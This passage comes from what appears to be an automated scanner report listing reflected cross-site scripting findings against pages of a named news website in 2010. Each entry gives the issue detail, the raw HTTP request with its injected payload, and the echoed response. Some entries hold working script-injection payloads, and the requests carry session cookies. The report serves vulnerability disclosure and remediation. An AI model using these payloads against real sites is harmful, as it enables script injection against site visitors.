<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /supportb8357--><script>alert(1)</script>dd4af33e9c/feedback.html
-->
...[SNIP]...

1.816. http://www.wired.com/support/feedback.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /support/feedback.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da586"><a>3aec687011 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /supportda586"><a>3aec687011/feedback.html HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29356
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:27 GMT
Date: Mon, 22 Nov 2010 01:10:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_supportda586"><a>3aec687011 ss_feedback.html">
...[SNIP]...

1.817. http://www.wired.com/support/feedback.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /support/feedback.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5811a"><a>144635f756b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /support/feedback.html5811a"><a>144635f756b HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29358
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:37 GMT
Date: Mon, 22 Nov 2010 01:10:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_support ss_feedback.html5811a"><a>144635f756b">
...[SNIP]...

1.818. http://www.wired.com/support/feedback.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /support/feedback.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload a49de--><script>alert(1)</script>e92652d32ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /support/feedback.htmla49de--><script>alert(1)</script>e92652d32ce HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29406
Vary: Accept-Encoding
Cache-Control: max-age=229
Expires: Mon, 22 Nov 2010 01:14:48 GMT
Date: Mon, 22 Nov 2010 01:10:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /support/feedback.htmla49de--><script>alert(1)</script>e92652d32ce
-->
...[SNIP]...

1.819. http://www.wired.com/techbiz [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /techbiz

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff7c9"><a>a3e95ddbbaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /techbizff7c9"><a>a3e95ddbbaf HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29347
Vary: Accept-Encoding
Cache-Control: max-age=231
Expires: Mon, 22 Nov 2010 01:15:36 GMT
Date: Mon, 22 Nov 2010 01:11:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_techbizff7c9"><a>a3e95ddbbaf">
...[SNIP]...

1.820. http://www.wired.com/techbiz/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /techbiz/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71ee4"><a>10a4cbe8c8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /techbiz71ee4"><a>10a4cbe8c8f/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29348
Vary: Accept-Encoding
Cache-Control: max-age=238
Expires: Sun, 21 Nov 2010 20:04:42 GMT
Date: Sun, 21 Nov 2010 20:00:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_techbiz71ee4"><a>10a4cbe8c8f">
...[SNIP]...

1.821. http://www.wired.com/techbiz/it [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /techbiz/it

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f59d"><a>02f6b01dd4f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /techbiz3f59d"><a>02f6b01dd4f/it HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29356
Vary: Accept-Encoding
Cache-Control: max-age=233
Expires: Sun, 21 Nov 2010 23:17:01 GMT
Date: Sun, 21 Nov 2010 23:13:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_techbiz3f59d"><a>02f6b01dd4f ss_it">
...[SNIP]...

1.822. http://www.wired.com/techbiz/it [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /techbiz/it

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b60b3"><a>63c96a35974 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /techbiz/itb60b3"><a>63c96a35974 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29356
Vary: Accept-Encoding
Cache-Control: max-age=564
Expires: Sun, 21 Nov 2010 23:22:55 GMT
Date: Sun, 21 Nov 2010 23:13:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_techbiz ss_itb60b3"><a>63c96a35974">
...[SNIP]...

1.823. http://www.wired.com/techbiz/it/magazine/16-05/mf_amazon [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /techbiz/it/magazine/16-05/mf_amazon

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c6b7"><a>d1b4a2e6128 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /techbiz9c6b7"><a>d1b4a2e6128/it/magazine/16-05/mf_amazon HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29392
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:17:10 GMT
Date: Sun, 21 Nov 2010 23:13:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_techbiz9c6b7"><a>d1b4a2e6128 ss_it c_magazine">
...[SNIP]...

1.824. http://www.wired.com/techbiz/it/magazine/16-05/mf_amazon [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /techbiz/it/magazine/16-05/mf_amazon

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f14a"><a>4c2c28c6943 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /techbiz/it3f14a"><a>4c2c28c6943/magazine/16-05/mf_amazon HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29392
Vary: Accept-Encoding
Cache-Control: max-age=572
Expires: Sun, 21 Nov 2010 23:22:58 GMT
Date: Sun, 21 Nov 2010 23:13:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_techbiz ss_it3f14a"><a>4c2c28c6943 c_magazine">
...[SNIP]...

1.825. http://www.wired.com/techbiz/it/magazine/16-05/mf_amazon [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /techbiz/it/magazine/16-05/mf_amazon

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 765b7"><a>9a5bd1ea91f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /techbiz/it/magazine765b7"><a>9a5bd1ea91f/16-05/mf_amazon HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29392
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:44 GMT
Date: Sun, 21 Nov 2010 23:13:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_techbiz ss_it c_magazine765b7"><a>9a5bd1ea91f">
...[SNIP]...

1.826. http://www.wired.com/techbiz/media [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /techbiz/media

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abdb7"><a>a468003d116 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /techbizabdb7"><a>a468003d116/media HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=231
Expires: Sun, 21 Nov 2010 23:17:01 GMT
Date: Sun, 21 Nov 2010 23:13:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_techbizabdb7"><a>a468003d116 ss_media">
...[SNIP]...

1.827. http://www.wired.com/techbiz/media [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /techbiz/media

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fee9"><a>e9bf0f03e78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /techbiz/media7fee9"><a>e9bf0f03e78 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:32 GMT
Date: Sun, 21 Nov 2010 23:13:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_techbiz ss_media7fee9"><a>e9bf0f03e78">
...[SNIP]...

1.828. http://www.wired.com/techbiz/media/news/2005/01/66333 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /techbiz/media/news/2005/01/66333

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 542e6"><a>86cc52af494 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /techbiz542e6"><a>86cc52af494/media/news/2005/01/66333 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29388
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:28 GMT
Date: Sun, 21 Nov 2010 23:13:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_techbiz542e6"><a>86cc52af494 ss_media c_news">
...[SNIP]...

1.829. http://www.wired.com/techbiz/media/news/2005/01/66333 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /techbiz/media/news/2005/01/66333

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20b6b"><a>02038e56cc2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /techbiz/media20b6b"><a>02038e56cc2/news/2005/01/66333 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29388
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:51 GMT
Date: Sun, 21 Nov 2010 23:13:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_techbiz ss_media20b6b"><a>02038e56cc2 c_news">
...[SNIP]...

1.830. http://www.wired.com/techbiz/media/news/2005/01/66333 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /techbiz/media/news/2005/01/66333

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5216c"><a>211e68f195d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /techbiz/media/news5216c"><a>211e68f195d/2005/01/66333 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29388
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:24:04 GMT
Date: Sun, 21 Nov 2010 23:14:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_techbiz ss_media c_news5216c"><a>211e68f195d">
...[SNIP]...

1.831. http://www.wired.com/techbiz/people [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /techbiz/people

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 105cf"><a>2b48aae5947 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /techbiz105cf"><a>2b48aae5947/people HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:17:15 GMT
Date: Sun, 21 Nov 2010 23:13:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_techbiz105cf"><a>2b48aae5947 ss_people">
...[SNIP]...

1.832. http://www.wired.com/techbiz/people [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /techbiz/people

Issue detail

